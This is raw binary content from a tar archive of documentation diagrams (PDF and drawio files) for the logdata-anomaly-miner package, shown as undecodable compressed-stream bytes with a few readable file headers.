2ԂqeGQ5ikumum^xNgU՞]5x AdG1Gcr/Z΍/_F gF  )gh`gu=]d@4Y6; k\˜8~ޓ?c,+ {O5f@΅jTJݟF]zƔfx!5w(}ef\YX1[er.E}TA([]Qׂ@[wإu|%\RwԼ#ZK-ߨMPumUZjTW"h]́M ":l-s;Xuyнر Bh}i|%㞴@jR uBJcPj AHɆ( 4:Ґ4!eV`!UV`bO6mzm l4l4l,"Y&Ehp['oS/% [ڙr[6'eA`+A`+A`+ ،& Cl1aPT!6CQ،%ˆ ~*lA`vg*l4lA`'@6 QTG-²(EhEu(4[o=/E=[& [& [FM[$$Q^$ H%% l-I`lI[ɐYНmKaCbN,#e=D'ATTAUeK(AV$(%@<lND-'?=iozz};s}ݮ$2OO.M@Y DP.k 5n ]`O:isn@xT,J%`u P3l0M Ua&%:+ou`HO9d4(jCsI=,88MԵd{|=SC7ݼKSr.M{ l.2I#\@ODb3Alh2C,, `1!K T^f%> stream xePj0}WcB4K,IKP쪮kۅw\&9g.gZ@P@)WWLlCqw:M~dK:*(ƦjĴU=av!kCH.!%%Ҡcb3O0LT÷fqF&ʹj]m|iZ\:g\jeGG:RO/9M,>kv}rIJ(ŪR澺}7:+r5r}5(d 9Nd~vRLxb?s&~46] goy0鐗ypH5==Z'БGO +p9.u\Z H[> stream x%qa{V$B P@I! ܆=E"bNi-nN^^skɘ2޵LʔLˌʜ˂,ʒ,ˊʚˆlʖlˎʞˁʑˉʙ˅\ʕ\ˍʝ˃QZ=~߷qIiYyYEYeYUYuِMْmّ]ٓ}9C9c9S9sKk[{y< yCF endstream endobj startxref 57992 %%EOFclass_diagram.drawio000066400000000000000000014150631500476301700345530ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams class_diagram.pdf000066400000000000000000006344031500476301700340370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 6 0 obj << /Filter /FlateDecode /Length 50968 >> stream x[J~~E>Jrsss3 tjatlReIe1NjἄS?ݎ[T`sw\;G/,,(,&D/TLCo |n^)/J IEuRvXZp/r]lD/_?_zI/__Jm/]mz!*iIaE)/~jɜ%xc",l37-|)Q}Kfl?UYD.%;\ggW! ήB.rqMyC..\g(pw)pw)pw) s]"MR.R.R.Φw)pw)pw)pήB.4; ܥ] ܥ] ܥ]bMR.R.R.]\wIhv6KKK$>; ܥ] ܥ] ܥ]:; l*pw)pw)pwI}v6KKKd:; l*pw)pw)pw}v*wsnIggWKDwsń|v6wsń9p7g]\w3oJ, IݒdT_-ZHyJXUWo`^_JVWe&+6Vrmu*{6׵ Ų] { -kD}WVScM.$#dhJEԸ묭 {lk}\]NYT`.r\r^GDs~']BWm_Dķ)ӏ ?__/ӿ?˚_zXd[+:=8%%|{k-nhy}3)^ }p>sHћP︢{[_x­^>dhI 87t2z<.^ [Dy;;=y\w+"L7o7~d٪=>?y`WoWЧ޼.,%Sݼzͫ%<?˿úBuLz|X֟q??W9YrSs~=_=9'\> w}~a?6_Mμ6ؖ'*-}`nW;޺y/Wkp cu ,DZoR_^lnwF2ByI(}|6\ t99>u'[{eZ 旜R?o|.;@wڋ?@8=i?xۭxw\{~ⵉvXFL&8v!(# e'[edk3AvT̠dk3Av 3PlM`N&0 &! 30d5f`>ᘁcΓ 1dnel`lM(q,l={ք`2:ٚ 2fi"c32ٚ 2f}1 '[c MC 321#321#321l@&fdbF&fdbF&fdblM`\id;21#321#321#dk3@&fvdbF&fdbF&fdbF&fvdbF&fdbF&fdbF&fdDN4 c22ٚP,X'!Ldd"#D&lM`D4Ldd"#DF&rvd"#DF&22Y'[2 MC DF&22\|DF&22LdfLJDF&22Ldd"Wl@&22Ldd"#Yu5 hDF&22Ldɶ6,-۫+/ZU%o&'ӧwl?1AռԽS~Zwy聯8u/:xoEJnN{pU ;»v=4to寪v{ cw} .ejKyW3=龾-_lU4<bٕ=)b/%"R{Dk*7M0k= = R޾N?HEDYܞeIJKHj_Xlu r=ߖZu:z/oRh٦epu4!`/߼HR˗]|MŤ^OARJVGx0t^̋UxZ뻭볿֥#KZ'.uf!)S$̵%)SVwݹ>jXR/j.vZN <2im;wF>XDN<^5qڲ*R;:/~ש`bBJ 1Sxu>Eߌ/%cul.}╋WU^~z4웅pcS.^x5˹܄aߔ˹Dؼ\M<z9z9pl^έ^έj4s˹)Eþs˹Dñy97z4v97q4s˹Fñy97S4~97K4s˹Gþiu޷Ӷ ~$4xmD Pϱ " XD#QӶ|H4xmD%0ϱ p"D(Bip@)r<6T"`hExL2*2*2*'xmU^eU^eU^嬃m22*2*2*29WxWxWx B^eU^eU^eU<6*2*2*rӶ|WYi '+0YxR)cy]Qo9?ڏTzlEJް:#cPvhY=W޿rݵl;}m׺naۮw~nʱR҆luhIa7\0 Ƹŵq@yI[Z%n;#yp!ᘓ?J50WAW:sTŝ kDϟ857+cQW]ֵ7eprJWj[ϳJ᷾j[&֯l굩Z埣 \I('4P'gWBXN O΋PNC9r!Jr!*B.5R}rv! (O΋ hEur^TB.F+ Xdr^TB.擳+xyr^TC.0Iˮ)II('4P'gWa.΋PNC9r!Lr!,B.9}rv!0O΋ pȅur^T%pW Mήw%pWw%pWw%pWOήw%pWw%pWw%pWD'E\w*pWw%pWw%pWw*pWw%pWw%pWwEur^T%pW&gW+++擳] ܕ] ܕ] yQK ܭ&gS5p[wknM>9 ܭ5p[I'E\wkUn ܭ5pݚ}rv[wkn ܭ5pN΋ B[wkn ܭ*p[wknr ܭ&gW5p[wkUn ܭ5pݪ:9/*[&gW5p[w*p݊CvxɺN -Rk'ټrOи:78OeN+z^;.LoxR~~{ #~\_ء^r.ixl۩Т{6@FW?bچn䚎v5(El]`9/ـY ?= 0~*^QFzrǺڶq{6ʝ>AIR^ZgݚoC׉f'+>@w7x ;|6Trnv53IZ_bLbr=Y-n~d¶?}#ç-Y}Ws/} Y[O6sc8TK^_/xSʞq 1dRd);Z^2MM6qBmMevle )e dke eC# @8;&8gykR>}4Vݵ/\‹4 u_ѧ^AO+7/,kk俺IQ1TlM`3:ٚ 3PlP@1fd;aO&0 L'[cN8f2ٚ 3plh lMQ, @J4LTd"DE&*d;2QLTd"Y'[2Q&!LTd"Del@&*2QLTd"dk3@&d;2QLTd"DE&*2QLTdVlM`DUl@&*2QLTd"U}DE&*2QLTfLTvd"DE&*2Q'. hDC&2ѐL F4L4d! hDC&d;2ѐL4d! hY'[2ј&!L4d! hDcl@&2ѐL4d!dk3@&d;2ѐL4do7,vXVcmki}oԛ߾.Gr9bnMR=>5m_iPkWum'#nWtݶJFW[ti꒫X?])|e?kJ2J굌&Y(2h[ҰWY͌]N'|=]Z?}WsUi%iڱA8JdʜZqY:qM!`2:ٚp(e&!`lM(q,3(AfP0 @0v 3lM`OCT̠b'[A N&0 &!3P@e5(f>aaƓ 0fd;cL&0 '.(%Rή$PNggW到l8PNfgWy(糳r!̳Kd]\84; \XfgW!ΦJȥ\ ήB.%RtvvrlJB.r]\$">;!r<; ԐKUEC.J) hEevvrѐlB.r1]\,b:; xiv6!ήB.rq] ܥ] ܥ] ܥ+̅whv6KKKD>; ܥ] ܥ] ܥ]:; l*pw)pw)pw}v6KKKTtvvr %T.R.R.l*pw)pw)pw*KJsWU}c{!_c\mv;pwylWuB=I-{p[}'߰۾2yZJ]K,-umZ6`^ߍ~~M-%5^!lP^rtSm;ؿ̃g5PNloTŽ5ggI]^:%s]֊Uz7,JMO:ǚnj Ǭ֦^JP嶩z]EgS Nr%+Y(g\XUȥ\j]\4iv6! h]\46;\,ήB.r:; xlC.r2; xmv*'%'PU j(WggWK&PPrevvUC9 lv6C.9*C.ήB.r4; \ήB.raMK <; RggW!,iv6wsń9p7Φwsń9p7ZggW!ݬiv6wsń9p7Φwsń9p7fKn4; ́9p7f8pw9pw9pw9Liv6ˁˁˁL6; ]]]uvvr eN]]]eT.r.r.rK.KMr.r.r.Φw9pw9pw9pk]\wYl*pw9pw9pwYmv6ˁˁˁluvvr eO]]]ey[wKn -%p:;\Jn4; -%p w+yrJmga'a{; sXeօ$I5jyn kYI{|o*k{m6v~ݷ͖}a6^7Ҷvmtv.5rE=UBt[Ӗ8+7LvA( S6UkfO:<}mrom7J҅:܀TBNn̛n9D+kB'i~~g@{ՈMzKiY]@iJ~{x=~:-膈v ˺;,Dd^zpzwƧz\+$&CO [Eݏ%=J^:8M$ٕrlJ c9ٕr*RC.fgS5RC.UfgW!r>;Ґ\ggW! ήB.r1MYB.&\ggSr*!N)wrJC9|v6ErJB9 tvvr!Lr!,KdMqȅC.̳ \XggW!])4; ܕ] ܕ] ܕ])>; ܕ] ܕ] ܕ]]\wl*pWw%pWw%pWwl*pWw%pWw%pWwEuvvr TJJl*pWw%pWw%pWwuvvݚhvJC9 dvvr>; ܭ5p[IggW!ݚiv6[wkn ܭ5pfM[wkn ܭKn-4; ܭ5p[Φwkn ܭ5pVU%pVM[wkn ܭggS5p[w*[fgS5p[wK,/Y2^5O%ۢ%W_Zzf_IzV0NNYƸ:D|R*a̜׆%V~Ro3kRs[h?ņRD 3* ÇL-D=K ֶm^lv ?C.[ݐr[lYwn{9+o>+Y1)\F15]G7,z\G1W_Sa!\t]= 2K\+.8+y\jn| ~ӯN|{ID/__5/Jۜ;Ot}#VsBԜ^h]7o]׶y[n|'7mor]!p{\?v{ 5L[%~!oŴ{pۮqUei]nam[\q2Goj^ƭ_g\x[%"DUPEWj>ƭM%R4i+^)sYK^9c\2ItuV˜U>iMvM qrΦ8r%+Y(g\XUȥ\J]\$"iv6%! H]\$"6;!ryvvr!ZggW! hMiEC.ZfgW! Φ,b!˳\ήB.r4;򐋇\ήB.rqX\]Pruvva.Φ(r%+Y(gr!ggW!]uvvr 5N] ܵ] ܵ] 5TZZZKIMZZZஉΦw-pw-pw-pj]\wMl*pw-pw-pwMmv6kkkfuvvr 5O] ܵ] ܵ] 5y(]]]OuvvxSMzzzஓΦw=pw=pw=ps]\wl*pw=pw=pwmv6끻끻끻^*fgS끻끻b]]]ZggW!]4; ]]]WMzzz[]\wl*pw=pw=pwmvwAJM-UՕiOoK?l%}i믭"&K1 W>˒p?H~? =1}oye0~/TJ]l˼.r;|]uCi[{K:1v9jEoN1tV⽎>Fǯ]7G]9묂ϵz,W;YgYrx *_ut8]&}Sǿ/oϽYN)uk{{/uy]H<ף][ ϫ>}Ayg_Zz)\j|vJ%詞A7>Rߥw=## ݁N%1IO}VrZ=m|6.wOTDBYZ:HZ,oӧg@-E֩:Jv~Uv9{w_Ry"gGYwT0b|oh1E1y 5#OL}nU>q}gc2k뒋tҨ]=V PwGE߄{咙S,|eDKZ*e*/ɟoF^,V eZ Пڟu\?o>{8x[N ̷̅Ou Ӈhg7Lxssχ^_g'2Om:S]۷Lݵ]5=^?Ͼzjח_n+Ch]uޛE[Ȅ&Ǿmx`s3\9x4&m/ ƶzl&y= Wfypm6[#ŗJR^T!uϜЕ *qV-?7Q>\YuwK0uARӥK.TZ>o)jutk bR(÷>OӚ&t$k[{:+Ѿt_\DX94Nqzt>EJG_*zm]^9պ ̉xmBA((քC"(C4AedkBclȘA 2O&0dlM`0MC0fdk3`̀}`3(<ٚ fPt5f 4!`" @0vT̠dk3Afd;bL&0 '! 30x5f`:ٚ 3plp1fd#DF&22t502&!Ldd"#D&l@&22Ldd"#9dk3@&2d;2Ldd"#DF&22Ldd"lM`Dl@&22Ldd"#Y|DF&22L䪓 JDF&22Ldd"OC DF&22l:ٚ 4Ldd"#DF&dEA&dbA&dbA&dbI:ٚ 2MC  2  2  2OC  2  2  2dlM`4L,ĂL,ĂL,>L,ĂL,ĂL,Rt5 d;2  2  2 d;2  2  2 KfL,JĂL,ĂL%3=W{jڙա E{{o!$tIz$>bȧK;;kz9 K<[;8^~9?ӕ}CkM5w՛NZ' ݙˮgXHc١7Q<_.fk_iN}v<5pCAuqwϋ8ErɞK7t/oN{"]54 _aǙMÏ7.ou":ow"Qğ9/?URۺsm1<7KY+[aڙ[f5G*OVxcWLU??}?0CƯΟ[~ʵC⁁>zhڏBkc"Q%'Su1u-O.rJiu5 -ZrupbσӵG({r[{?oAg|P85֦LORK p1Z\O[2_]f{F=Y1x _k(|)zws_'~$I>|nm[_.~^[ں_+ʢX=nm̵q}|=w旷sҲ9nmZG]@潿Y]:ؠfד=_biK%q(rGyi^\ۛ<ۻg|![Ռ׶Myp9|n/T,ԵȺ,%g&%}/g$-io_=C7i/RA?^' z{g}nbI[-BZ&/6{9ץuxƺ!?s2~֣q ԟyX^h ؗu3^I"2ת1 Zu}Ej:4PkΞ/JKYZrI3낞o=V/{׮d9@JQPNB9]i(硜Φ1#]I(ήB.9iv6C.9evvr!쳳)pȅyvvr *RB.fgS%RB.EfgW!r)>;\ggW! ήB.5Riv6UC.5Revvr!곳) hEyvvrѐ*b!ٔ\,b2; X|v6!8ήB.rq]a.kf8PNfgWy(糳] ܵ] ܵ] 5U%p2Φw-pw-pw-pײΦw-pw-pw-pXggW!]+4; ܵ] ܵ] ܵ]+>; ܵ] ܵ] ܵ]]\wl*pw-pw-pwl*pw-pw-pwMuvvr 5TZZl*pw-pw-pwuvvx'>PNB9]i(硜Φw=pw=pw=pIggW!]4; ]]]>; ]]]g]\wl*pw=pw=pwoo眗?o}e9xfY\YGO+'N6f}i"T?iYz}Kn$Iuy[ۿ~ W!~W{ċW?WwkW 6KMʒ).ɒ=Wʷ.lz-_8-<5Js_++.V$~Eȶg]l{{z[u 3]Q,_Q>ӗ }jZ-+>c;=[[xԱ~uCz>RNzIVɭۭzNw }d TbϪO\)o,N2usv":v%Ya>f={=1Ia#f:=>vOk 6'IEuEQ4[wGݵ>j[ve W\eŴc,iAU:Mɼ:Vgw;]|MS~{ojvv]8iIk5ZzJ*AӄvMiJ(WfgW5PfgSe,gyvvrUC.fgSr񐋗UC.nP0MˡPή0%PPrevvUC9 lv6C.9*C.ήB.r4; \ήB.raMK <; K\$Φ$"!)\fgS5RC.5ήB.Z*fgSj] ] ] UKzMjjj஺CYZZZ+wl*pw-pw-pwlv6kkk*kfgSkkkl] ܵ] ܵ] ܵRggW!]4; ܵ] ܵ] ܵ]MZZZ:; TZZl*pw-pw-pw*kfgSkkknP끻끻끻 s]4; ]uo7ՃHh[95ۯvRZћq^e ~u81q[o:v+UxsE:2(O:e~+Bk)1D$ Qy,wpQĩc=o)r#@K%ϝ*p]i[9ۯ6_wnwow{5ܖBZ^ַL^HӺ:~j &Ml:b_Ά7Ee%lʜu>!: qw?b <4/-=)m+3I>nj-KbIuZJjrj :v円f"YDYׁךwZ)ߥwtkӥS悫KXN ۏM@bC~J}mHj-|W|w6zz)'ή4PggS\e,Wyvv%r:; hEiv6! ήB.rQMYB.Ƴ\LggW!8Φ;!r<; ԐKUEC.J) hEevvrѐlB.r1]\,b:; xiv6!ήB.rq] ܥ] ܥ] ܥ+̅whv6KKKD>; ܥ] ܥ] ܥ]:; l*pw)pw)pw}v6KKKTtvvr %T.R.R.l*pw)pw)pw*KJ] ܥ] ܥ] %T.R.R.*KN] ܥ] ܥ] %ٚJz.$qemmUM(2@v/fA֓Rn&]>/+9gM?d.dMu˂dzq_e%OʣK&cWιxqזԼ{ p34Z0ݓ@ >(uu󨓦dKy=|GM֎痭q.#KY\\'lT&m~x̓^Oke7}x/ʰOdڶʵ[]VI(yKdKU.5"Ƽ[uM$2"~)= noj{镗8Ү3+`~L)c=S޿-J#~>tY_.%wXC Nm  :fkօb2>ښe2C̣ 2etu0f4ښ`̀1fhk`3(<ں fPtuf 4ښ@0f hkb3<ں *fPuu(f4ښP@1fhk0 G[a 1քc.0 G!,A. 2etu2шF[DC&2ѐL4d&L4d! hD:ں 4ښ@&2ѐL4d!}5L4d! hDC&ZfL42ѐL4d! h⣭ d! hDC&2Ѫ.0d)&L4d! hDSmM  hDC&2ѐf:ں 4ښ@&2ѐL4d!}‘Ltd#DO:ں D d#DG&:2G[DG&:2ёLtdgm]`DgmM DG&:2ё>ښ@&:2ёLtd#h3@&hkDG&:2ёLtѶہ5Uj'9/E˺b2>qBER:켩ӪEÔa[#|7nTRqn]~ceou9@{8&zϜĠ￷ZJ XBe!3v^$ښ@&dbA&dbA&dbQm]`b4ښ@&dbA&dbA&db1mM  2  2  2. A&J&2eduXƱ&Ld (D!m]`D4ښ@& 2QLd %hk(DA& 2QLfLB d (DA& 2QarrZx{yIyFik˗5-(_\}tyӻN3N hu⃫5烴ZŅ© $#[/v-] ܮ>xS?>JWօjbz7\&e'Yo҉~kZ$!Z+7,@ν;o\~`zUm["b c22ںP,XG[DP.(f1Ld h3ȘAc0.0 XG[A & fP0" ̠`G[f <ں 3m]`34ښA .0TmM(fh3P@uuf`4ښ00f`hk1 G[c Ƞ Kі'ehBcmM  2  2  2.0db4ښ@&dbA&dbA&db>ښ@&dbA&dbA&dbam]`Rh5L,ĂL,ĂL,R|5L,ĂL,ĂL,":ں hkXXXhkXXXEuu hkXXX|5L,ĂL,ĂL,:ں (F[n0,# 2e|5Ld (DA& h3@&J2QLd (G[DA& 2QLd.0dmM (DA& 2QR|bn B@Pf6[/-ojKV>ucS5\^ItP6ו1Jo#Q)VѶ{ W=ߌM`Yme7l[1oZŖj59vW+geP:j9vCPfhuYdA~3vǹP/_4#\]|:QYzqɥuR8oS\=ٸ #?RN_t/QRo]6h]?`m](q,㣭 "(C eG[eh3ȘAD 2feud hk1 G[c ̠`F[3(AfP0⣭ 3m]`.0TmMT̠bUF[A &3P@yu(f:ں 30mMf`h30|5ᘁcΣ 1dP5h c22ںP,XG[ĊLĊLĊL X3&XXX&XXXYG[2mM +2"+2"+2mM +2"+2"+2.0db4ښ@&VdbE&VdbE&Vdb>ښ@&VdbE&VdbE&VdbUm]`j4ښ@&VdbE&VdbE&Vdb5mM +2"+2"+2. E&j2eduXƱ<d"D%m]`D4ښ@&*2QLTd"5hkDE&*2QLTfLB d"DE&*2Q<d"Dm]`D4ښ@&*2QLTd"hkDE&*2QLTfLT2QLTd"mT$tM늩kKzlR{6;ߴ*۾5as7\=xwE^{׭ )u|=6vln*sR[R*%8y +feaOyk?tT.Evu豷!RjTJD],Wcm,r\ڋq7Lw2mlpKgk$uviL3;n; ?k&ijVRQ}4SSָ?jEOkOBFmX|}SO1 08+ bt&Q?iahد٧șM!6[XF.8D&(dm]Q, ̀1c.0 G[3(AfP0 @0ք`.0 G[3AfP1 @1քb.0 G[f`<ں 30m]`8&3peu8f>eAO. 2etu02F[DF&22Ldd"&Ldd"#D:ں 4ښ@&22Ldd"#}5Ldd"#DF&rfLd2Ldd"#⣭ d"#DF&22.0d"+&Ldd"#DVmM DF&22l:ں 4ښ@&22Ldd"#}  2  2  2$m]@XF[ĂL,ĂL,ĂL,䣭 dbA&dbA&dbA& XF[ĂL,ĂL,ĂL,죭 dbA&dbA&dbA& XF[ĂL,Lm)-Jio.Y ,?JQ?jϦi;~NL5&{C;NKyѡSϚ1[뾹MbmK=ArM2:=>ܳ]y'g6_MJ7ʈxiZϨ'tj Ce77枿^9ULoߟjD}e,E%ZiG[7juN2%z෎xvuIidzRyv^6۔^D~zgAq©c[:TkmB.xoBж& b,#XFF[ehk" e2.(fhk1 XF[c죭̠h3(Af hkB0 DF[`⣭T̠h3AfhkB1 TF[b꣭ 30m]`.0 F[8f2ں 3pmX[zmEu!XF. F&2hkDF&22Ld2Ldd"#YG[2F[DF&22Ldd"&Ldd"#D.:ں ,4ښ@&22Ldd"#Y|5Ldd"#DF&rfLd2Ldd"#꣭ d"#DF&22MG[2F[DF&22Ldd"CdbA&dbA&dbA& Ƞ  hkXXX|5L,ĂL,ĂL,Ēuu &Ir\[Ҝ*|gؕא"%5K HpyD[;MWȏ$~lDF&22Ld2Ldd"#lmȒg[DF&22Ldd"϶Csy9b%_+W[ӭ +[_;o#}x?>vlK;֣ˎ⏳Xx.IcnO:Z+S[Q-^OL砿Pwr׽,(ݹ`D5V.AjPMgN܅puvl]%oul°cm]P:DPh f@6ۆ 3<ۺ`̀16flB0 f`bm@1ͳ 3PmC`϶. 30h f`6ۆ *fPlb32ۆ *fP}uᘁcNm16do<"r a:2ۆ0Xg[27u2Ͷ!ֱ6fLg[DB&2L$d"m]  HDB&2D6ۆ yuL$d"! HDB&lHDB&2L$6fL$ͳ d"! HDB&2g[DB&2L$d"Ͷ!0d"<ۺ@&2L$d"!lHDB&2L$6dDNy:ud aXDZ϶.Ldd"#D6ۆ \lDF&22LⳭ d"#DF&22f29϶.Ldd"#Dfm] DF&22,6ۆ yuLdd"#U^^u!Gߜowyb_wӺ*URyS)ezC21rY~}]⏣X5ٖf_OZoڝ{Qo\8?imrmbPE!? d/?ү I"+W} OMOyr|m5SW⏳> P;qE(խ<ֶ}Tۖd_zI<076L7}Suj^n3/opyY]G;r]%R[/Wsm@7\d ˬ/xu>w'D7+ݰz݋t+]pG_-* *1Z"c鍃%2\zVݔ~{{k^}lLg>޾>k _5>|+fu7п溺`S>W>_1c )Y^[l^tp<" f>C_&x6luLZ^*>@;/,խο=ݢi3.^ߊ-y넛~|͞\_wZ KG)շ_o%3 WJ:P]~uǗ,LQzhx7S)W6%-}w}Ẍ́'y1϶l$T,C/=ß!ir*mK4?NTzxrCm2yzs=N7e&O/ߎWx2z~L^6;}|;^ͷ=e&O/8ޒ'Y.pe8[|e%8^pK6yzx9Op 2yzx'Y8^< +pbxW9 ǫp*xW}e58^pk6yzx5O Rx+^isW Rx+u<|;^^YʓNe'Y^ʀW2,e8^qLh/[֠m!RYDRb~jݰ^XTL6Y8i}68'yoEZyoTڜ/8Tok,#w9o?oLe]r.{󨟆˳zDTpy?M9 dr9@[I+#g{Դ> Z*.oȔ9w~|I"G(,_y)@_{nޜެ1l~]. DPE !XǰͶ!x:g[NXG̶!0 g)NI!m:ul m=nurm]d:ud aXDZ϶. fP0Bm̠`fag[f@2ۆ 3 m]0fl3`̀m f yu!`"m@0օb(Ͷ!0 fag[f`2ۆ |uL,ĂL,ĂL,Rm  2  2  2 l;! HDB&2l 2rm]  HDB&2}uL$d"! HDB&R6fL$ʳ d"! HDB&2g[DB&2L$d"Ͷ!0d"Im]  HDB&2$>ۺ@&2L$d"!Im  lHDB&2L$2L$d"! Hf2<϶.L$d"! HDrm`d"#DF&22Ͷ! F&rγ d"#DF&22϶.Ldd"#D.6ۆ LyuLdd"#DF&2lDF&22Ld6fLdɳ d"#DF&22g!~~lgt\6)kډW|V_]i#>p^Lrr{G/`{wMy$D[8~隴"%~Fy.εnAsӲ;@ _6gu[S=﫩%sNRrҼښeI^(-Hd)R|5&I-Cs^vq bMTx>'^/.\~)8o&.0fvtM9k=?`ɇ @\%wWzWz8ՏTLz:PC=_] aBs( ,Գ9TȅB.WgWr *B!\8´: pȅmurٕ\$": HE|uv! (ΡB.rQ[C\,byuve! ΡB.r1_]ՐK TZC\jȥ*!ϫ+xeurBEw`mmgY_b'~b{QK{~m{k+ BwO{ssjMNOgjݾ4Ҥy|c>W+֚-{Ɨ{G/>A`3;jx#o9vxv P_9JXt KMhƒ gjR~`zIle}_@N;q9ɦ)ji_Uя;q޺ϝ󊗗n [geNlhB/k^~?r-Ui/c&jӏl߻3tɫFo陒o粿>~(>GQΡw[= dqޔzJ3SzJ$ԳPM\,byqe! ,Λ X|qUC.5RiqTȥ\-Λ xC.rqY7rJ s9Ttޔz)E3r*S',ΛPC=_CK Z7r)!bB.r8 \HM\(B8 \M\8¶8o*Ps] ] ] UyS!]8 ] ] ]5_CjjjV[7r Uϋs] ] ] UٕZZZ%[7X8 ܵ] ܵ] ܵ]˾8 ܵ] ܵ] ܵ]+8o*kPkkks] ܵ] ܵ] 5yS!]8 ܵ] ܵ] ܵ]_CZZZன-Λ 9TZZ*pw-pw-pw⼩Ky^CZZZஹ/S=6m֤gXD8~m}y>?΢|.wֺ{k}$H[K=ގe{vziM.~UWtk|~=&j1c-)Y{P헽 Wߞ=|k+ߥu`wGQ`ir`k%ϘQ)҄{zEo [mBm U_5śY<եEnŸ yz_}./xLclYaqΙoWoN8Yw2廮o\uK>RFF>w>ȫ~?SN8EuSڷ@#;9;LZ绚.^ހ/7ʮ7м]/g0KT_q"cX[u4C͋JXG,. 8v 30Zl]`-.0ԼNQ1TYl]`3NᘁcN 1d 28E:uduaXDZ/Sd@2dp`Ba[l]`3(y`3(غ fP|0 [ad ̀1΋0fغ 3`_l@& 2QLd Elu Eb;2QLd (DA& 2QLd-.0dԼNLd (DA&Jv d (DA& 2Q["5_֑օa:NLTd"DE&jfLԒ)LTd"D-NLTd"DE&*b3@&*v d"DE&*2Q)LTd"D[l]`DռNLTd"DE&b;2QLTd"f 5/S DE&*2QZ}DE&*2QLTd`DKy:uduaXDZ/S  hDC&2ѐmu vf+#f:VǬ_^oXxVx[zS!3L4+RYJQ weGa[띵ك4kޘ[4u?Ѣiu4CK-L?/Ζ'd47?ߚ}~露sGyg\Grޒ(i$i˘|v֧9 ߾CWZc߁g~ܝ\dچ+d.#>N/$דksSiO}?M\Gx{ yM ;. 5 Y &_vO&v sWȸ+[}Y~/?}\p=NSy_y+՞%)v/s}Ku0e {iti׶~ćk qR[goNbexy^vO</rF)y}^R{D/Lt5%u=.KaIicV]z3A<.;S.bj͟nEZGcJ37z5[MHӽc/if7CIO%p~Ut~U{n%  m6lJX6[ulڀ;-6Ff~H7[-Kk:"f^׻>V|0/m*N,@zx1/0WM|n#~(p?Ƒr9 eCuՠϺE[Lmx~[_m6o>0q|"[ImDʲƢ[J>^y՜g͏UlݱoWy\k*+ Ϙ#Vc/uXj_>X}Z7U"_g/'_p5 _rGf_-/ۯ>5'ٗ(I"5]^޴ƥVzT7*^%^nCttD r[~\⯻^EogS?Yq,S?'O/++9˜n~.7? ~N^8^I,  O^8^,+j< ǫpx 9kpƓx 92yzV< p&Yv8^u< p^'Qt;^N=e_'O/ߎx2zr.geks=*sR;|5ū_rwWbg͹]d-S~QzMk[['+mSrިں">Umu~U. #V|Q^6NrWE^/Ւqj22z[JojFN}'No?q~oqKNiJӺ$E[}վюmo+!ާ'e?Y1tdei 5пp5Du#ȝYb'>PS qO_Q<<>E'1-qf/3Nr\֛mnm<˴ 9V; D@aP~fVx[bRgKM+x}#T_.:z;lm/N\ntu'|kiia{bp=%D˓VPyj`]"n '>J4&m7"i33j},xd@؟oᄐ)^-)7ץ_ށtlP|CiWzyZdgO_c;m63?pv?B,r'5Ή14wH!1DgZݒ%i[8ߍo~}ܻl0&FM&xPeLz\mƻ3`c*m }gc_?A+g8gS< dm.zw[;z4p[Jʶ%nWK-l_Ix~"L!)m|r}1&z~{j,xog-8YX7MŮn.[_yvlPZ^m-Y`Öfh m7>qyZ{|Ik+̐m+Vq~ycw~0Cg?%_yyq0J==?I;69]1[> mm.vr:?0/Tr:g?lVVZ_wv~v_N^bFi}3*8&kgX3yN\__e_'O/:sx'O/:s _x2zz˷vG=g93yN\x o)x opKie%8^pKuee8^.xu2JewSr۰@K-k.{Ab?/x%k;DR궯SJ۵@c_6 TwQKfߖ=ϔ.[Y\B_9lym@yvvM/UHʷTiɓ;u۸`@{>YWG=|qtJ7(~ AQ $ԓ9z2#zDs( ,Գ9TȅC.WgWr *!ٕ\$": HElurѐٕ\4䢲: hE}uve! ΡB.r1[C\jȥU ԐK9Tȥ\ήȰ6-ln\hH/ 37r1 w>?DrAA1`01̄Lv6̤&_;YmjKq&߻R P2 _]Nx~eQjKe_8?rPc @e~﹝~wvFֶ^QW+d5pkI5-'VlMSk,gNwϾ`(Dn7Cꜟx:%PWPPήJz`RVPis \(ή(B!9TȅB.TWgWr 9TȅC.s\$ή$"!9TEB.RWgWrѐ9TEC.s\,ή,b!9TB.VWgW5RC.ΡB.5Ruur񐋧ٕ\<: x<0>X6ؼ$nŕF>=5i?rcHO?%>P;Vs{*ޖ~g7{ʦM5RcQAT#rhVH4]jO{tFg] RHN[Bl~N"jyLlD^ _%ke3/S:w UZӴcڤ BP8)"غ(ul°cm]P:DPh f@6ۆ 3<ۺ`̀16flB0 f`bm@1ͳ 3PmC`϶. 30h f`6ۆ *fPlb32ۆ *fP}uᘁcNm16dHulBXG̶! 8E ں:fu l3@&Rɳ d"! HDB&2϶.L$d"! HD"mC`D<ۺ@&2L$d"!}uL$d"! HDB&l3@&2L$d"! H곭 d"! HDB&2f2jm]  HDB&2T}uL$d"! HDB&l2`d"<ۼ`mCq㳭 d"#DF&22Ͷ!0d"<ۺ@&22Ldd"#lDF&22Ld6fLdγ d"#DF&22g[DF&22Ldd"Ͷ!0d"km] D&VUҷ*5fZv26 64/ K*V]/.VTuix-ٗfOq.[_o~G]n~yz6h%q_3_sW󏻗g7@\USZGڡHnmQY2^įm-[{œ7"K/ou 1k8=zQ쁳gg\]_\/9N{Ԗܯ }YR67J<=w>G>0twg|ogq~g6JZ偳L~eˋfl^Dߛ׏'.'ԍGOi}8r>xToEsO?KJm,HPܶj|Ym}f؁/|pZ_rZ岎w[݃qw!r0t$m!GWZ =_z`|K|sXI>T3~fKx·CU6m߽|X|7~b/h?0^qMc/v_1ؚTf_yda¶gHۗa_ﮱ+c<zoJyB'# 'X3[Y28%5=pnU^w|.DߏZ"vojNޥ >'?zޝ_gEWo)%iۋϏ :Q6?14!ɫ_~yr1k.5:x}"lV,G 'R?!^6bK# Kv~LV v?*pWnvQgk.yl/v?}%n@/:.X>C_W<[APnb#;g~NϏwy>s?R>pFާ/Z_#{/It#jg I7OhmGmV}ovo|` _n^ҶhN'޸ ?IIGϰOG>ok3nm:mE^4zo@4O;W睗\y@q;/<~7B%qS;-׷s“u+y9'9K=N ߺ#=mZzZ txnc޻^mAvz-v)saUtsFq|ϣ޷LoұQqs 